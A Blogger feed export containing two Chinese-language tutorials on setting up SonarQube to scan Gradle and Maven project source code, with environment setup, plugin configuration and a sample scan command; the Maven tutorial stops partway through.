tag:blogger.com,1999:blog-19678250562836522872024-03-14T04:46:03.553+08:00雅技資訊日誌雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.comBlogger183125tag:blogger.com,1999:blog-1967825056283652287.post-3444609381788690932023-10-02T15:43:00.002+08:002023-10-02T15:43:44.494+08:00以SonarQube掃描Gradle專案源碼<div style="border: 3px solid rgb(208, 250, 88); line-height: 150%; padding: 8px;">
<p style="margin-bottom: 8px; text-indent: 2em;">
<a href="https://www.sonarsource.com/products/sonarqube/downloads/" target="_blank">SonarQube</a>
<span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #333333; font-size: 14.85px; text-indent: 29.7px;">是一套白箱掃描工具,本例使用開源免費的Community版</span><span style="color: #333333;">本,有關安裝方式可參考「<a href="http://atic-tw.blogspot.com/2023/03/kali-linuxarachnisonarqube.html" style="color: #992211;" target="_blank">在KALI Linux建置黑、白箱掃描系統(Arachni及SonarQube)</a>」一文。</span></p>
<p style="margin-bottom: 8px; text-indent: 2em;">本文以SonarQube提供的範例「<a href="https://github.com/SonarSource/sonar-scanning-examples" target="_blank"> </a><span style="color: #bf9000;"><u>sonar-scanning-examples-master\sonarqube-scanner-gradle\<span style="background-color: #fcff01;">gradle-multimodule</span></u></span>」做示範說明,置於「C:\sonar-scanning-examples-master\sonarqube-scanner-gradle\gradle-multimodule」目錄下。若想掃描其他gradle專案,請依該專案環境、結構酌作調整,尤其工具及Java版本。</p>
<p style="margin-bottom: 2px;"><b>一、必要需求</b></p>
<p style="margin: 0px 2px 2px 2em;">(一)適合待掃專案的JDK</p>
<p style="margin: 0px 2px 2px 4em; text-indent: -1em;">1.本例使用Java 13,筆者將它放置於C:\JAVA\jdk-13.0.2。</p>
<p style="margin: 0px 2px 2px 4em; text-indent: -1em;">2.建立環境變數「JAVA_HOME」,讓它指向「C:\JAVA\jdk-13.0.2」。</p>
<p style="margin: 0px 2px 2px 4em; text-indent: -1em;">3.在<span style="color: red;">PATH</span>環境變數中加入「%JAVA_HOME%\bin」,讓作業系統可以找到javac.exe。</p>
<p style="margin: 0px 2px 2px 2em;">(二)gradle工具(用來建立 Gradle Wrapper)</p>
<p style="margin: 0px 2px 2px 4em; text-indent: -1em;">1.至<a href="https://gradle.org/releases/" target="_blank">Gradle官網</a> 下載Gradle工具包,直接解壓縮到自選目錄,例如「C:\gradle\gradle-8.0.2」。</p>
<p style="margin: 0px 2px 2px 4em; text-indent: -1em;">2.建立環境變數「GRADLE_HOME」,讓它指向「C:\gradle\gradle-8.0.2」。</p>
<p style="margin: 0px 2px 2px 4em; text-indent: -1em;">3.在<span style="color: red;">PATH</span>環境變數中加入「%GRADLE_HOME%\bin」,讓作業系統可以找到gradle.exe。</p>
<p style="margin: 0px 2px 2px 4em; text-indent: -1em;">4.執行 gradle -v 確認gradle.exe可執行。</p>
<div style="background-color: black; line-height: 100%; margin: 2px 2px 1em 0px; padding: 4px;"><pre><span style="color: white;">C:\></span><span style="color: #e69138;">gradle -v</span><span style="color: white;">
------------------------------------------------------------
Gradle 8.0.2
------------------------------------------------------------
Build time: 2023-03-03 16:41:37 UTC
Revision: 7d6581558e226a580d91d399f7dfb9e3095c2b1d
Kotlin: 1.8.10
Groovy: 3.0.13
Ant: Apache Ant(TM) version 1.10.11 compiled on July 10 2021
JVM: 17.0.2 (Oracle Corporation 17.0.2+8-86)
OS: Windows 10 10.0 amd64
C:\></span></pre>
</div>
<p style="margin-bottom: 2px; margin-top: 0px;"><span style="color: #134f5c;"><b>二、修改待掃專案的build. gradle,加入sonar scanner插件:</b></span></p>
<p style="margin: 0px 2px 2px 2em;">本例使用4.3.1.3277版插件,這裡可查詢<a href="https://plugins.gradle.org/plugin/org.sonarqube" target="_blank">gradle可用的各版本sonar scanner插件</a>,請選擇合適的版本。</p>
<div style="background-color: black; margin: 2px 2px 2px 0px; padding: 4px;"><pre><span style="color: white;">plugins {
……其他的plugin……
</span><span style="color: #04ff00;">// 為SonarQue加入適當版本的插件,參考建立Sonar掃描專案後,Sonar所提示的版本</span><span style="color: white;">
</span><span style="color: #fcff01;">id 'org.sonarqube' version '4.3.1.3277'</span><span style="color: white;">
}</span></pre>
</div>
<p style="margin-bottom: 2px;"><b><span style="color: #134f5c;">三、執行掃描:</span></b></p>
<p style="margin-bottom: 8px; margin-left: 4em; margin-top: 0px; text-indent: -2em;">(一)啟動SonarQube Scanner Server,假設位於「 <span style="color: #cc0000;">http://192.168.232.153:9000</span>」</p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(二)以瀏覽器連線SonarQube Scanner Server,並建立掃描專案(如重掃描舊專案,請備妥 Project Token)</p>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">1. 由Projects頁面選擇「Create Project」->「Manually」</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibW-o7_UvtEMgoaWACgDgDq-C6_jLXFRWNk3SkIIrg8hhpx4CM9HKwbv5cn1jjjwNnETkXfGbhQT-UWuoYO3fHf5ffLT6t_BN7x7mp098e-6t-FIlCCxGeiNFnkl1cBQiHkpdwRJvn7SSW15z4iPob32aHPXclfGd6rcPkNT7GbnCmn7Z_PRLIUxbznYjW/s1573/sonar_net_003.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="246" data-original-width="1573" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibW-o7_UvtEMgoaWACgDgDq-C6_jLXFRWNk3SkIIrg8hhpx4CM9HKwbv5cn1jjjwNnETkXfGbhQT-UWuoYO3fHf5ffLT6t_BN7x7mp098e-6t-FIlCCxGeiNFnkl1cBQiHkpdwRJvn7SSW15z4iPob32aHPXclfGd6rcPkNT7GbnCmn7Z_PRLIUxbznYjW/w400-h63/sonar_net_003.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">2.社群版只能選擇「Locally」</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhByJ7HVS7oWNFB1Xc42d97Q0z8Xw7x_00hQaUVOw_qIjEaGLJADXyaQniwTMjzham_65wekiC-1a3WURsh0I6AWTpivGkvblW2t3oHJha09vVrt9lyxcc1D8JEL1pRf5Qp8QsNulc8BVFVtibqpLATmsIpvPZ_kMqEYoGp3tEcq1ISne27UWlp8ffv_-P_/s647/sonar_net_005.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="647" data-original-width="440" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhByJ7HVS7oWNFB1Xc42d97Q0z8Xw7x_00hQaUVOw_qIjEaGLJADXyaQniwTMjzham_65wekiC-1a3WURsh0I6AWTpivGkvblW2t3oHJha09vVrt9lyxcc1D8JEL1pRf5Qp8QsNulc8BVFVtibqpLATmsIpvPZ_kMqEYoGp3tEcq1ISne27UWlp8ffv_-P_/w273-h400/sonar_net_005.PNG" width="273" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">3.填入「Project display name」(專案名稱)及「Project key」(專案鍵名)</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp2f1XO_N8a_PWwBjtHoxWUTd3-vS0y-VdjYkTS_62g4_ejRN8jc0ShXxbY0xFo8ydxOp94HUFLTvNmMoHDvyJxKlydxBxyzglRciPB3t8sfJezxDaEkZCYsEdtmR1U7N8jld3ocd6-543ijHA0J7dnYc3mHgqcRONEHU2tUhkaLpER9Gbt0WqfayKBvOc/s700/sonar_net_004.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="700" data-original-width="549" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp2f1XO_N8a_PWwBjtHoxWUTd3-vS0y-VdjYkTS_62g4_ejRN8jc0ShXxbY0xFo8ydxOp94HUFLTvNmMoHDvyJxKlydxBxyzglRciPB3t8sfJezxDaEkZCYsEdtmR1U7N8jld3ocd6-543ijHA0J7dnYc3mHgqcRONEHU2tUhkaLpER9Gbt0WqfayKBvOc/w314-h400/sonar_net_004.PNG" width="314" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">4.產生Project Token(專案身分代號)</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfk5iqDshw6OkOBLyU-ZWpO4VNyRm1H7i4U5BUuYdSxNDyvCpsgr6JjCw1iGdrKGJxr_N78qL2nY3stQQ8Iym9WtEyR3N-P_vSf7O1VNZi7x7lcbIvksFiDCJW0AZplwilcOixmCPKp7chzvWxEMrOSXP7ZKB-FUlwHyCdDBwrHqSTKZ2IVXVPo_M2vlPQ/s815/sonar_net_006.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="613" data-original-width="815" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfk5iqDshw6OkOBLyU-ZWpO4VNyRm1H7i4U5BUuYdSxNDyvCpsgr6JjCw1iGdrKGJxr_N78qL2nY3stQQ8Iym9WtEyR3N-P_vSf7O1VNZi7x7lcbIvksFiDCJW0AZplwilcOixmCPKp7chzvWxEMrOSXP7ZKB-FUlwHyCdDBwrHqSTKZ2IVXVPo_M2vlPQ/w400-h301/sonar_net_006.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">5.請記下Project Token</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOuVYqrrgqZlXR2uPHIYi1GwZchWM1W4i3-R2aGkNcArLVaHClwhjhWGaKkCR5O1wMTAuBNBrmL0Qa1OPLgwg6uvrMtNJsVIia4dWpLKwKiXFtMdn3t5X98lle8725nvg-0AlwSyUDoDdUZJEjx-JavgDqv0TUvCcqIyHk_yEdKykSh7h-qihZG9lAQwe9/s846/sonar_net_core_007.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="563" data-original-width="846" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOuVYqrrgqZlXR2uPHIYi1GwZchWM1W4i3-R2aGkNcArLVaHClwhjhWGaKkCR5O1wMTAuBNBrmL0Qa1OPLgwg6uvrMtNJsVIia4dWpLKwKiXFtMdn3t5X98lle8725nvg-0AlwSyUDoDdUZJEjx-JavgDqv0TUvCcqIyHk_yEdKykSh7h-qihZG9lAQwe9/w400-h266/sonar_net_core_007.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">6.選擇要被掃描的專案類型(Gradle)</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMb393hmPQJuXxcT0wqk8Q6i4m3iKXqodDEH3dtZoiuVvxJVElqXTuSA9vy2g8IxAO92pftbrUPVrIwPsSzYu_6F_hDRDzYMUBVWXGImaFzwEHm_CayPvJ1jmvM6eafNcSrPHmNZPQ-WYqidHjR_rOS0PzMtC8-_tlyas22vQS9jaP_AlnwiQk2NUQAi6u/s1577/gradle-01.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="691" data-original-width="1577" height="175" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMb393hmPQJuXxcT0wqk8Q6i4m3iKXqodDEH3dtZoiuVvxJVElqXTuSA9vy2g8IxAO92pftbrUPVrIwPsSzYu_6F_hDRDzYMUBVWXGImaFzwEHm_CayPvJ1jmvM6eafNcSrPHmNZPQ-WYqidHjR_rOS0PzMtC8-_tlyas22vQS9jaP_AlnwiQk2NUQAi6u/w400-h175/gradle-01.PNG" width="400" /></a></div><br />
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(三)開啟命令提示字元,將工作目錄切換到待掃描的Gradle專案目錄,本例係位於C:\sonar-scanning-examples-master\sonarqube-scanner-gradle\gradle-multimodule,此範例已自帶「gradle wrapper」。<br />若您的專案目錄下<b>沒有</b>「<span style="color: red;">gradle\wrapper</span>」目錄,則需要<span style="text-indent: -2em;">於此專案目錄下執行「</span><span style="color: #e69138; text-indent: -2em;">gradle wrapper</span><span style="text-indent: -2em;">」,完成後,會在此目錄下新增.gradle、gradle兩個目錄及gradlew、gradle.bat兩檔案。<br />若待掃專案<b>已有</b>.gradle、gradle兩個目錄及gradlew、gradle.bat兩檔案,可跳過此步驟。</span></p><p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(四)注意 gradle\wrapper\目錄裡<span style="color: red;">gradle-wrapper.properties</span> 檔的 <b><span style="color: red;">distributionUrl</span></b> 項目所指定之 gradle 版號(可至<a href="https://services.gradle.org/distributions/" target="_blank">https://services.gradle.org/distributions/</a> 查看所有版號),及所使用的JDK版本。<br />若gradle service版號或JDK版本與待掃專案不匹配,建置過程會發生錯誤。</p>
<div style="background-color: black; color: white; line-height: 100%; margin: 2px 2px 1em 0px; padding: 4px;"><pre><span style="color: #04ff00;">#Tue May 19 06:55:41 BST 2020</span>
distributionUrl=https\://services.gradle.org/distributions/gradle-<span style="background-color: red;">6.4.1</span>-all.zip
distributionBase=GRADLE_USER_HOME
distributionPath=wrapper/dists
zipStorePath=wrapper/dists
zipStoreBase=GRADLE_USER_HOME
</pre></div>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(五)如果已完成項一及項二的要求,便可直接複製及執行SonarQube所提供的命令。<br />由於此命令是Linux格式,本例是在Windows環境執行,需調整命令語句,將原始命的整理成單一列。</p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(六)執行過程如下所示(<span style="color: #e69138;"><b>橘紅色部分是我所執行的命令</b></span>)</p>
<div style="background-color: black; border: 1px dashed rgb(211, 84, 0); line-height: 100%; padding: 4px; word-break: break-all;"><span style="color: white;">C:\sonar-scanning-examples-master\sonarqube-scanner-gradle\gradle-multimodule></span><span style="color: #e69138;">gradlew.bat sonar -Dsonar.projectKey=Example-Gradle-Project -Dsonar.host.url=http://192.168.232.153:9000 -Dsonar.login=sqp_99a6eebeda445bce288e94afae9aa409e7454d75</span><br /><span style="color: white;">> Task :sonar</span><br /><span style="color: white;">SCM provider autodetection failed. Please use "sonar.scm.provider" to define SCM of your project, or disable the SCM Sensor in the project settings.</span><br /><span style="color: #04ff00;">BUILD SUCCESSFUL</span><span style="color: white;"> in 39s</span><br /><span style="color: white;">2 actionable tasks: 2 executed</span><br /><span style="color: white;"><-------------> 0% WAITING</span><br /><span style="color: white;">> IDLE </span></div>
<p style="margin-bottom: 8px; text-indent: 2em;">如果前面各步驟無誤,應該可以完成掃描,最後會看到「BUILD SUCCESSFUL」。如果過程出現錯誤,請仔細研讀訊息,善用Google或ChatGPT找出解答。</p>
<p style="margin-bottom: 8px; text-indent: 2em;">完成掃描後,可在SonarQube Scanner Web UI看到專案結果~~</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAdcWGXBL6deMSo-lk67YG9XwZr8CdI5bpt298g1EwdhhVhDEEjlmFG6bLYcUJn_4ZQTHylZbHoRKV1HMADmdKBfWRT8nFLXkoG0K3QPHDpqCvbYQ8wUPs-j5lmcYaYzss3BP44YGBqwEpInEV2zvT3mLZt8DRjaMHOkJg5MsPre_7Ta4jSVCboxiKHE0s/s1600/gradle-02.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="438" data-original-width="1600" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAdcWGXBL6deMSo-lk67YG9XwZr8CdI5bpt298g1EwdhhVhDEEjlmFG6bLYcUJn_4ZQTHylZbHoRKV1HMADmdKBfWRT8nFLXkoG0K3QPHDpqCvbYQ8wUPs-j5lmcYaYzss3BP44YGBqwEpInEV2zvT3mLZt8DRjaMHOkJg5MsPre_7Ta4jSVCboxiKHE0s/w400-h110/gradle-02.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div>
<p style="margin-bottom: 8px; text-indent: 2em;">完成掃描後,可在SonarQube Scanner Web UI看到專案結果~~</p>
<hr style="border: 2px solid rgb(14, 230, 34);" />
<p style="margin-left: 1em;">關於 dotNet Framework 專案的掃描,請參閱:<a href="http://以SonarQube執行.netFramework專案的源碼掃描(白箱掃描)">以SonarQube執行.netFramework專案的源碼掃描(白箱掃描)</a></p>
<p style="margin-left: 1em;">關於 dotNet Core 專案的掃描,請參閱:<a href="http://atic-tw.blogspot.com/2023/09/sonarqubedotnet-core.html" target="_blank">以SonarQube掃描dotNet Core專案源碼(白箱掃描)</a></p>
</div>雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-70053634287241851012023-09-28T11:05:00.003+08:002023-10-01T14:58:14.319+08:00以 SonarQube 掃描 maven 專案源碼(白箱掃描)<div style="border: 3px solid rgb(208, 250, 88); line-height: 150%; padding: 8px;">
<p style="margin-bottom: 8px; text-indent: 2em;">
<a href="https://www.sonarsource.com/products/sonarqube/downloads/?gads_campaign=SQ-Mroi-PMax&gads_ad_group=Global&gads_keyword=&_gl=1*va5gvw*_up*MQ..&gclid=CjwKCAjwmbqoBhAgEiwACIjzEI66FX1-IEadA5PhZD8AlOYcaDmlO2JNog-wx0y8seU7bEGnQSX7NBoCkNAQAvD_BwE" style="background-color: white; color: #992211; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 14.85px; text-decoration-line: none; text-indent: 29.7px;" target="_blank">SonarQube</a>
<span face="Arial, Tahoma, Helvetica, FreeSans, sans-serif" style="background-color: white; color: #333333; font-size: 14.85px; text-indent: 29.7px;">是一套白箱掃描工具,本例使用開源免費的Community版</span>
<span style="color: #333333;">本,有關安裝方式可參考「<a href="http://atic-tw.blogspot.com/2023/03/kali-linuxarachnisonarqube.html" style="color: #992211; text-decoration-line: none;" target="_blank">在KALI Linux建置黑、白箱掃描系統(Arachni及SonarQube)</a>」</span>
</p>
<p style="margin-bottom: 8px; text-indent: 2em;">本文以SonarQube提供的範例「<a href="https://github.com/SonarSource/sonar-scanning-examples" target="_blank">
<span><span style="color: #bf9000;">sonar-scanning-examples-master\onarqube-scanner-maven\</span><span style="background-color: #ffe599;"><span style="color: #990000;">maven-multilingual</span></span></span><span style="background-color: #ffe599;"><span style="color: #990000;">
</span></span>
</a> 」做示範說明,若想掃描其他maven專案,請依該專案環境、結構酌作調整,尤其工具及Java版本。</p>
<p style="margin-bottom: 2px;"><b>一、必要需求</b></p>
<p style="margin: 0px 2px 2px 2em;">(一)maven</p>
<p style="margin: 0px 2px 2px 4em;">到 <a href="https://maven.apache.org/download.cgi" target="_blank">Apache Maven Project</a> 下載合適版本的Maven(本例使用 maven-3.9.0),並<span style="text-indent: 2em;">解壓縮到自選目錄,例如「C:\maven\apache-maven-3.9.0」。</span></p><p style="margin: 0px 2px 2px 4em;">建立環境變數「<span style="color: #cc0000;">M2_HOME</span>」指向「C:\maven\apache-maven-3.9.0」。</p><p style="margin: 0px 2px 2px 4em;"><span style="text-indent: 2em;">在 </span><span style="color: #cc0000; text-indent: 2em;">PATH </span><span style="text-indent: 2em;">環境變數中加入「%M2_HOME%\bin」,讓作業系統可以找得到mvn.exe。</span></p>
<p style="margin: 0px 2px 2px 2em;">(二)適合待掃專案的JDK</p>
<p style="margin: 0px 2px 8px 4em;">本例使用Java 11,位於C:\JAVA\jdk-11.0.2。</p>
<p style="margin-bottom: 2px; margin-top: 0px;"><b><span style="color: #134f5c;">二、修改待掃專案的pom.xml,加入sonar scanner:</span></b></p>
<p style="margin: 0px 2px 2px 2em;">如果不想修改待掃專案的POM.XML,可參考「三、執行掃描」的第(四)點。</p>
<div style="background-color: black; margin: 2px 2px 2px 0px; padding: 4px;"><pre><span style="color: white;"><build><br /> <pluginManagement><br /> <plugins><br /> <plugin><br /> <groupId>org.apache.maven.plugins</groupId><br /> <artifactId>maven-compiler-plugin</artifactId><br /> <version>3.8.1</version><br /> </plugin><br /></span><span style="color: #04ff00;"><!-- 以下為SonarQube而建 --></span><span style="color: white;"><br /></span><span style="color: #fff2cc;"> <plugin><br /> <groupId>org.sonarsource.scanner.maven</groupId><br /> <artifactId>sonar-maven-plugin</artifactId><br /> <version>3.9.1.2184</version><br /> </plugin></span><span style="color: white;"><br /></span></pre>
</div>
<p style="margin: 0px 2px 8px 2em;">這裡可查詢<a href="https://mvnrepository.com/artifact/org.sonarsource.scanner.maven/sonar-maven-plugin" target="_blank">各個版本的sonar scanner插件</a>,請選擇合適的版本,本例是使用 3.9.1.2184。</p>
<p style="margin-bottom: 2px;"><b><span style="color: #134f5c;">三、執行掃描:</span></b></p>
<p style="margin-bottom: 8px; margin-left: 4em; margin-top: 0px; text-indent: -2em;">(一)啟動SonarQube Scanner Server,假設位於「 <span style="color: #cc0000;">http://192.168.232.153:9000</span>」</p>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(二)以瀏覽器連線SonarQube Scanner Server,並建立掃描專案(如重掃描舊專案,請備妥 Project Token)</p>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">1. 由Projects頁面選擇「Create Project」->「Manually」</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibW-o7_UvtEMgoaWACgDgDq-C6_jLXFRWNk3SkIIrg8hhpx4CM9HKwbv5cn1jjjwNnETkXfGbhQT-UWuoYO3fHf5ffLT6t_BN7x7mp098e-6t-FIlCCxGeiNFnkl1cBQiHkpdwRJvn7SSW15z4iPob32aHPXclfGd6rcPkNT7GbnCmn7Z_PRLIUxbznYjW/s1573/sonar_net_003.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="246" data-original-width="1573" height="63" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibW-o7_UvtEMgoaWACgDgDq-C6_jLXFRWNk3SkIIrg8hhpx4CM9HKwbv5cn1jjjwNnETkXfGbhQT-UWuoYO3fHf5ffLT6t_BN7x7mp098e-6t-FIlCCxGeiNFnkl1cBQiHkpdwRJvn7SSW15z4iPob32aHPXclfGd6rcPkNT7GbnCmn7Z_PRLIUxbznYjW/w400-h63/sonar_net_003.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">2.社群版只能選擇「Locally」</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhByJ7HVS7oWNFB1Xc42d97Q0z8Xw7x_00hQaUVOw_qIjEaGLJADXyaQniwTMjzham_65wekiC-1a3WURsh0I6AWTpivGkvblW2t3oHJha09vVrt9lyxcc1D8JEL1pRf5Qp8QsNulc8BVFVtibqpLATmsIpvPZ_kMqEYoGp3tEcq1ISne27UWlp8ffv_-P_/s647/sonar_net_005.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="647" data-original-width="440" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhByJ7HVS7oWNFB1Xc42d97Q0z8Xw7x_00hQaUVOw_qIjEaGLJADXyaQniwTMjzham_65wekiC-1a3WURsh0I6AWTpivGkvblW2t3oHJha09vVrt9lyxcc1D8JEL1pRf5Qp8QsNulc8BVFVtibqpLATmsIpvPZ_kMqEYoGp3tEcq1ISne27UWlp8ffv_-P_/w273-h400/sonar_net_005.PNG" width="273" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">3.填入「Project display name」(專案名稱)及「Project key」(專案鍵名)</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp2f1XO_N8a_PWwBjtHoxWUTd3-vS0y-VdjYkTS_62g4_ejRN8jc0ShXxbY0xFo8ydxOp94HUFLTvNmMoHDvyJxKlydxBxyzglRciPB3t8sfJezxDaEkZCYsEdtmR1U7N8jld3ocd6-543ijHA0J7dnYc3mHgqcRONEHU2tUhkaLpER9Gbt0WqfayKBvOc/s700/sonar_net_004.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="700" data-original-width="549" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp2f1XO_N8a_PWwBjtHoxWUTd3-vS0y-VdjYkTS_62g4_ejRN8jc0ShXxbY0xFo8ydxOp94HUFLTvNmMoHDvyJxKlydxBxyzglRciPB3t8sfJezxDaEkZCYsEdtmR1U7N8jld3ocd6-543ijHA0J7dnYc3mHgqcRONEHU2tUhkaLpER9Gbt0WqfayKBvOc/w314-h400/sonar_net_004.PNG" width="314" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">4.產生Project Token(專案身份代號)</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfk5iqDshw6OkOBLyU-ZWpO4VNyRm1H7i4U5BUuYdSxNDyvCpsgr6JjCw1iGdrKGJxr_N78qL2nY3stQQ8Iym9WtEyR3N-P_vSf7O1VNZi7x7lcbIvksFiDCJW0AZplwilcOixmCPKp7chzvWxEMrOSXP7ZKB-FUlwHyCdDBwrHqSTKZ2IVXVPo_M2vlPQ/s815/sonar_net_006.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="613" data-original-width="815" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjfk5iqDshw6OkOBLyU-ZWpO4VNyRm1H7i4U5BUuYdSxNDyvCpsgr6JjCw1iGdrKGJxr_N78qL2nY3stQQ8Iym9WtEyR3N-P_vSf7O1VNZi7x7lcbIvksFiDCJW0AZplwilcOixmCPKp7chzvWxEMrOSXP7ZKB-FUlwHyCdDBwrHqSTKZ2IVXVPo_M2vlPQ/w400-h301/sonar_net_006.PNG" width="400" /></a></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">5.請記下Project Token</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOuVYqrrgqZlXR2uPHIYi1GwZchWM1W4i3-R2aGkNcArLVaHClwhjhWGaKkCR5O1wMTAuBNBrmL0Qa1OPLgwg6uvrMtNJsVIia4dWpLKwKiXFtMdn3t5X98lle8725nvg-0AlwSyUDoDdUZJEjx-JavgDqv0TUvCcqIyHk_yEdKykSh7h-qihZG9lAQwe9/s846/sonar_net_core_007.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="563" data-original-width="846" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOuVYqrrgqZlXR2uPHIYi1GwZchWM1W4i3-R2aGkNcArLVaHClwhjhWGaKkCR5O1wMTAuBNBrmL0Qa1OPLgwg6uvrMtNJsVIia4dWpLKwKiXFtMdn3t5X98lle8725nvg-0AlwSyUDoDdUZJEjx-JavgDqv0TUvCcqIyHk_yEdKykSh7h-qihZG9lAQwe9/w400-h266/sonar_net_core_007.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div>
<p style="margin-bottom: 8px; margin-left: 5em; text-indent: -2em;">6.選擇要被掃描的專案類型(Maven)</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZXZikEOybXNhW9KZxJdpD4VOKdFsuC6aHDCxh_TTWvvr8ft6_ZjN0aLE88QdawVDB2ZLiRmuG_tqpuclSPgf-hCjLF826PA_hqaSdLiYjjNeQ66WCPlYx7NMqL4Y8XFuctG0rTIsifkYKkZLK0j2ESJmChiMHxvv78JEbrNQE-DDcbMC-9-EKK5tIScQN/s1660/maven%E6%8E%83%E6%8F%8F01.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="702" data-original-width="1660" height="169" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZXZikEOybXNhW9KZxJdpD4VOKdFsuC6aHDCxh_TTWvvr8ft6_ZjN0aLE88QdawVDB2ZLiRmuG_tqpuclSPgf-hCjLF826PA_hqaSdLiYjjNeQ66WCPlYx7NMqL4Y8XFuctG0rTIsifkYKkZLK0j2ESJmChiMHxvv78JEbrNQE-DDcbMC-9-EKK5tIScQN/w400-h169/maven%E6%8E%83%E6%8F%8F01.png" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><br /></div>
<p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;">(三)開啟命令提示字元,將工作目錄切換到待掃描的Maven專案目錄,本例使用<a href="https://github.com/SonarSource/sonar-scanning-examples" target="_blank">sonar-scanning-examples-master</a>的sonarqube-scanner-msbuild專案做示範,下載後置於C:\sonar-scanning-examples-master\sonarqube-scanner-msbuild。</p><p style="margin-bottom: 8px; margin-left: 4em; text-indent: -2em;"><span style="text-indent: -2em;">(四)如果已完成項一及項二的要求,便可直接複製及執行SonarQube所提供的命令。<br />由於此命令是Linux格式,本例是在Windows環境執行,需調整命令語句,將原始命的整理成單一列:</span></p>
